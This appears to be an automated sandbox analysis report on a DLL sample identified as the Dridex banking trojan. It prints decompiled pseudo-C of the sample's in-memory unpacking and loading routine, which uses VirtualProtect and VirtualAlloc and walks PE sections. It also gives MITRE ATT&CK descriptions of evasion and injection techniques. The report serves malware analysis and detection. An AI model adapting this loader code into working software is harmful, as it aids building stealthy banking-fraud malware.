				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0xfc4418 = 1;
				asm("movaps xmm0, [0xfc3010]");
				asm("movups [0xfc4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00FC26BF();
				E00FC23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E00FC26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E00FC26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0xfc4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x00fc206e
0x00fc207c
0x00fc2083
0x00fc2086
0x00fc2090
0x00fc2097
0x00fc20a1
0x00fc20a7
0x00fc20b0
0x00fc20b9
0x00fc20bc
0x00fc20c2
0x00fc20c6
0x00fc20ce
0x00fc20d5
0x00fc20d8
0x00fc20db
0x00fc20de
0x00fc20e1
0x00fc20fb
0x00fc2101
0x00fc2104
0x00fc210c
0x00fc2110
0x00fc2113
0x00fc2116
0x00fc2119
0x00fc211c
0x00fc2138
0x00fc2155
0x00fc217a
0x00fc217c
0x00fc2185
0x00fc2188
0x00fc2192
0x00fc2195
0x00fc2198
0x00fc219b
0x00fc219e
0x00fc236f
0x00fc236f
0x00fc22ce
0x00fc22d4
0x00fc21a9
0x00fc21b7
0x00fc21bf
0x00fc21c2
0x00fc21c4
0x00fc21ca
0x00fc21d6
0x00fc21d9
0x00fc21dc
0x00fc21df
0x00fc23b1
0x00fc23b1
0x00fc22ef
0x00fc22f5
0x00fc22fb
0x00fc2301
0x00fc2307
0x00fc230d
0x00fc2313
0x00fc2316
0x00fc2319
0x00fc2321
0x00fc2329
0x00fc232f
0x00fc2335
0x00fc233b
0x00fc2341
0x00fc234f
0x00fc22bb
0x00fc22c1
0x00fc22c1
0x00fc22da
0x00fc238e
0x00fc2394
0x00fc21ea
0x00fc21ea
0x00fc2204
0x00fc2229
0x00fc2238
0x00fc223b
0x00fc223f
0x00fc2243
0x00fc224a
0x00fc2250
0x00fc2252
0x00fc225b
0x00fc226c
0x00fc2272
0x00fc2278
0x00fc227b
0x00000000
0x00000000
0x00fc2281
0x00000000
0x00fc21ea
0x00fc22aa

APIs

VirtualProtect.KERNELBASE ref: 00FC20E1
VirtualProtect.KERNELBASE ref: 00FC217A

Strings

\, xrefs: 00FC2321

Memory Dump Source

Source File: 0000000E.00000002.642356890.0000000000FC0000.00000040.00000010.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 44fe4025af18da9638c903837f79e09925cddfe26717715e4d9db9470a40b449
Instruction ID: ab2c434156a0caf1c288277705414f17b3327b9e69e2d64c5f22daed6056a244
Opcode Fuzzy Hash: 44fe4025af18da9638c903837f79e09925cddfe26717715e4d9db9470a40b449
Instruction Fuzzy Hash: 5B91BCB5E042198FDB54CF98C681A9DFBF1FF48310F25806AE958AB352D334A981DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FC2250

Strings

\, xrefs: 00FC2321

Memory Dump Source

Source File: 0000000E.00000002.642356890.0000000000FC0000.00000040.00000010.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: f6b4f782d412923e7dbcab38c881da6ac6d3377ce6353e973589905eb57e01c2
Instruction ID: f15a355f57e73da0ef6b75ba04ef4b904a211574164ab740ccabe7ac37b7bac5
Opcode Fuzzy Hash: f6b4f782d412923e7dbcab38c881da6ac6d3377ce6353e973589905eb57e01c2
Instruction Fuzzy Hash: EE51BEB5E002298FDB24CF59CA81A9DBBF1FF88310F2581A9D958A7311D730AD91DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00FC1F29

Memory Dump Source

Source File: 0000000E.00000002.642356890.0000000000FC0000.00000040.00000010.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: cecc03782632e82dc5ba0fc3a13f6c8fe7554f2f2c20770b195e9da94fb34cec
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 0F41D4B5E0421A8FDB04DFA8C591AAEBBF1FF48310F14856DE848AB341D379A850DF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2212 Parent PID: 1624 rundll32.exeCOMMON

Executed Functions

Function 00F72062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00F72062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0xf74418 = 1;
				asm("movaps xmm0, [0xf73010]");
				asm("movups [0xf74428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00F726BF();
				E00F723B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E00F726BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E00F726BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0xf74418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x00f7206e
0x00f7207c
0x00f72083
0x00f72086
0x00f72090
0x00f72097
0x00f720a1
0x00f720a7
0x00f720b0
0x00f720b9
0x00f720bc
0x00f720c2
0x00f720c6
0x00f720ce
0x00f720d5
0x00f720d8
0x00f720db
0x00f720de
0x00f720e1
0x00f720fb
0x00f72101
0x00f72104
0x00f7210c
0x00f72110
0x00f72113
0x00f72116
0x00f72119
0x00f7211c
0x00f72138
0x00f72155
0x00f7217a
0x00f7217c
0x00f72185
0x00f72188
0x00f72192
0x00f72195
0x00f72198
0x00f7219b
0x00f7219e
0x00f7236f
0x00f7236f
0x00f722ce
0x00f722d4
0x00f721a9
0x00f721b7
0x00f721bf
0x00f721c2
0x00f721c4
0x00f721ca
0x00f721d6
0x00f721d9
0x00f721dc
0x00f721df
0x00f723b1
0x00f723b1
0x00f722ef
0x00f722f5
0x00f722fb
0x00f72301
0x00f72307
0x00f7230d
0x00f72313
0x00f72316
0x00f72319
0x00f72321
0x00f72329
0x00f7232f
0x00f72335
0x00f7233b
0x00f72341
0x00f7234f
0x00f722bb
0x00f722c1
0x00f722c1
0x00f722da
0x00f7238e
0x00f72394
0x00f721ea
0x00f721ea
0x00f72204
0x00f72229
0x00f72238
0x00f7223b
0x00f7223f
0x00f72243
0x00f7224a
0x00f72250
0x00f72252
0x00f7225b
0x00f7226c
0x00f72272
0x00f72278
0x00f7227b
0x00000000
0x00000000
0x00f72281
0x00000000
0x00f721ea
0x00f722aa

APIs

VirtualProtect.KERNELBASE ref: 00F720E1
VirtualProtect.KERNELBASE ref: 00F7217A

Strings

\, xrefs: 00F72321

Memory Dump Source

Source File: 00000011.00000002.642403091.0000000000F70000.00000040.00000010.sdmp, Offset: 00F70000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 538b277c8e4ce2f1fe494d65a39f8992fdeb53f19e30a0be385f5a6c2c440e53
Instruction ID: cadf2a05fa2b48f45d61045819257bbf508d456afc6684360a19bb870f8b85c2
Opcode Fuzzy Hash: 538b277c8e4ce2f1fe494d65a39f8992fdeb53f19e30a0be385f5a6c2c440e53
Instruction Fuzzy Hash: A891BEB5E042188FDB44CF99C980A9DFBF1FF48314F25846AE958AB352D334A981DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F721EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00F72250

Strings

\, xrefs: 00F72321

Memory Dump Source

Source File: 00000011.00000002.642403091.0000000000F70000.00000040.00000010.sdmp, Offset: 00F70000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 1ec494f12dc6fe538e0cc42e8557a8f9db91f7239cc8c2b85d9b586ccb3009ee
Instruction ID: ad203633b51b9b7c70bee0706dd63974d42b527d83b1ed89fbd58e73847d65b5
Opcode Fuzzy Hash: 1ec494f12dc6fe538e0cc42e8557a8f9db91f7239cc8c2b85d9b586ccb3009ee
Instruction Fuzzy Hash: 2F51E1B5E002298FDB10CF59C980A9DFBF1BF88310F6581AAD958A7312D730AD81DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F71E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00F71F29

Memory Dump Source

Source File: 00000011.00000002.642403091.0000000000F70000.00000040.00000010.sdmp, Offset: 00F70000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 4b3480302bd8e0b24aeb0e1857270357f0781b55a8cdfb7f19a789e806e515a3
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: DF41D3B5E042198FDB04DFA8C4906AEBBF1FF48310F14852EE848AB341D379A844DF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 1624 Parent PID: 5932

General

Function 01252062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Function 6ED00754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Function 6ECF1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6ECFA52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6ECF846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6ED09348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6ED01460, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6ED01D58, Relevance: .3, Instructions: 282
COMMONCrypto

Function 6ECF6D50, Relevance: .0, Instructions: 36
COMMON

Function 6ECFC218, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON

Function 00FC2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Function 00F72062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON